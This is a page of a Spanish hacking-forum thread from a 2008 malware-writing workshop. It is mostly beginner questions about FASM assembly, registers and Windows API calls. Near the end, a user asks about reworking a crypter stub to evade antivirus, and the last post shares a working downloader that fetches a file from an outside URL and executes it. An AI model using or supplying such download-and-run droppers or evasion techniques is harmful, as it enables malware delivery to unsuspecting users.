elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware
| | |-+  Abril negro (Moderadores: Man-In-the-Middle, WHK, kub0x, fary)
| | | |-+  Abril Negro 2008: Taller de ASM
0 Usuarios y 3 Visitantes están viendo este tema.
Páginas: 1 2 3 4 5 6 [7] 8 9 10 Ir Abajo Respuesta Imprimir
Autor Tema: Abril Negro 2008: Taller de ASM  (Leído 74,265 veces)
elmeister

Desconectado Desconectado

Mensajes: 43


Ver Perfil
Re: Abril Negro 2008: Taller de ASM by E0N
« Respuesta #60 en: 25 Abril 2008, 07:11 am »

supongo que si, ya que es una API de Windows


En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Abril Negro 2008: Taller de ASM by E0N
« Respuesta #61 en: 25 Abril 2008, 14:12 pm »

Si, solo q FASM a diferencia de VB ya trae muchas constantes predefinidas en la win32ax y otras librerias, por eso no tienes como hacer como en VB de andar poniendo el valor de la constante MB_YESNO.
Solo miras en la MSDN la descripcion del api y usas las constantes tal cual

Salu2


En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: Abril Negro 2008: Taller de ASM by E0N
« Respuesta #62 en: 25 Abril 2008, 18:22 pm »

muchas gracias por responderme :D i la ultima preguntita que ago ,en codes de E0n i en ejemplos e visto esto:
Código
  1. format PE GUI 4.0
  2. entry start      
¿para que sirve?
gracias de antgemano
s4lu2!
En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: Abril Negro 2008: Taller de ASM by E0N
« Respuesta #63 en: 25 Abril 2008, 22:48 pm »

indica el formato y el punto de entrada "main".
En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: Abril Negro 2008: Taller de ASM by E0N
« Respuesta #64 en: 26 Abril 2008, 21:42 pm »

muchas gracias por todas las respuestas!!!!!!  , ya se que dije que era mi ultima pregunta pero tengo otra espero no molestar.bueno mi pregunta es eax no acepta mas de 4 letras?? por que por ejemplo en este code que acabode hacer no me deja meter mas de 4 caracteres a eax mirad:
Código
  1. include 'C:\Documents and Settings\krackwar\Escritorio\fasmw16726\INCLUDE\win32ax.inc'
  2. .data
  3. msg dd ?
  4. .code
  5. start:
  6. mov eax , "pre"
  7. mov [msg],eax
  8. pop eax
  9. push MB_YESNO
  10. push msg
  11. push msg
  12. push 0
  13. call [MessageBoxA]
  14. cmp eax , IDNO
  15. je no
  16. mov eax , "si"
  17. mov [msg] , eax
  18. push 0
  19. push msg
  20. push msg
  21. push 0
  22. call [MessageBoxA]
  23. push 0
  24. call [ExitProcess]
  25. no:
  26. mov eax , "no"
  27. mov [msg] , eax
  28. push 0
  29. push msg
  30. push msg
  31. push 0
  32. call [MessageBoxA]
  33. jmp start
  34. .end start              
En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: Abril Negro 2008: Taller de ASM by E0N
« Respuesta #65 en: 26 Abril 2008, 22:35 pm »

es logico, estamos trabajando con registros de 32 bits. eax es un DWORD.
En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Abril Negro 2008: Taller de ASM by E0N
« Respuesta #66 en: 27 Abril 2008, 17:04 pm »

Citar
EAX, EBX, ECX, EDX: Estos cuatro registros serán los que usemos principalmente para almacenar datos. Tienen el tamaño de un DWORD, es decir 4 bytes o lo que es lo mismo 32 bits.

Para poner palabras con mas caracteres simplemente pusheas un puntero en la pila y arreglado ;)
En línea

alexkof158


Desconectado Desconectado

Mensajes: 415


LOL


Ver Perfil
Re: Abril Negro 2008: Taller de ASM by E0N
« Respuesta #67 en: 30 Abril 2008, 05:03 am »

hellou bob marley, hey puedo abrir el stub del Xcrypter y copiar su codigo y pasarlo a asm, de alli puedo coger los movs que coge el av y puedo quitar o redireccionarlos a otra pila?? algo asi? me esta dando cacao esta chimbada. Helpme man
En línea

"noproxy"
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Abril Negro 2008: Taller de ASM by E0N
« Respuesta #68 en: 1 Mayo 2008, 16:53 pm »

No :P Puedes adaptarte un poco el codigo, pero copiando y pegando tal cual no te va a funcionar. Mejor aprende a programarte un crypter tu mismo ;)



He actualizado el primer post. Se han añadido tres capitulos, uno con unas cuantas instrucciones que nos faltaban por aprender, otro con las distintas estructuras que puede tomar el código en FASM y otro en el que explico como declarar variables, asi que cuando los leais ya sabreis hacer algún programilla básico ;)

Salu2 E0N
En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: Abril Negro 2008: Taller de ASM by E0N
« Respuesta #69 en: 2 Mayo 2008, 00:41 am »

ola ,bueno muy buenas las partes agregadas .Inspirandome en un downloader que hizo Hendrix ise el mio propio y les paso el code para quien le sirva.
Código
  1. include 'C:\Documents and Settings\ezzexziimohn\Escritorio\fasmw16726\INCLUDE\win32a.inc'
  2. format PE GUI 4.0
  3. push 0
  4. push 0
  5. push archivo
  6. push web
  7. push 0
  8. call [Descargar]
  9.   push 2000
  10.   call [dormir]
  11.      push 0
  12.   push titulom
  13.   push mensajem
  14.   push 0
  15.   call [mensaje]
  16.   push 2000
  17.   call [dormir]
  18. push SW_SHOW
  19. push 0
  20. push 0
  21. push archivo
  22. push 0
  23. push 0
  24. call [Ejecutar]
  25.    push 0
  26.   call [terminar]
  27.   mensajem db 'El archivo a sido descargado en c:\foto.jpg', 0
  28.   titulom db 'downloader basico by krackwar', 0
  29.   web db 'http://es.geocities.com/e0n_ftp/bob.jpg' , 0
  30.   archivo db 'c:\foto.jpg' , 0
  31. data import
  32.  
  33.  library kernel,'KERNEL32.DLL',\
  34.          user,'USER32.DLL',\
  35.           dlldes, 'urlmon.dll',\
  36.          shell, 'SHELL32.DLL'
  37.  
  38.  import kernel,\
  39.   dormir , 'Sleep',\
  40.         terminar,'ExitProcess'
  41. import dlldes ,\
  42.    Descargar ,'URLDownloadToFileA'
  43. import user,\
  44.       mensaje,'MessageBoxA'
  45.  
  46.  import shell,\
  47.         Ejecutar, 'ShellExecuteA'
  48.  
  49. end data        
En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
Páginas: 1 2 3 4 5 6 [7] 8 9 10 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Abril Negro 2008
Abril negro
WHK 0 3,542 Último mensaje 4 Febrero 2017, 19:30 pm
por WHK
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines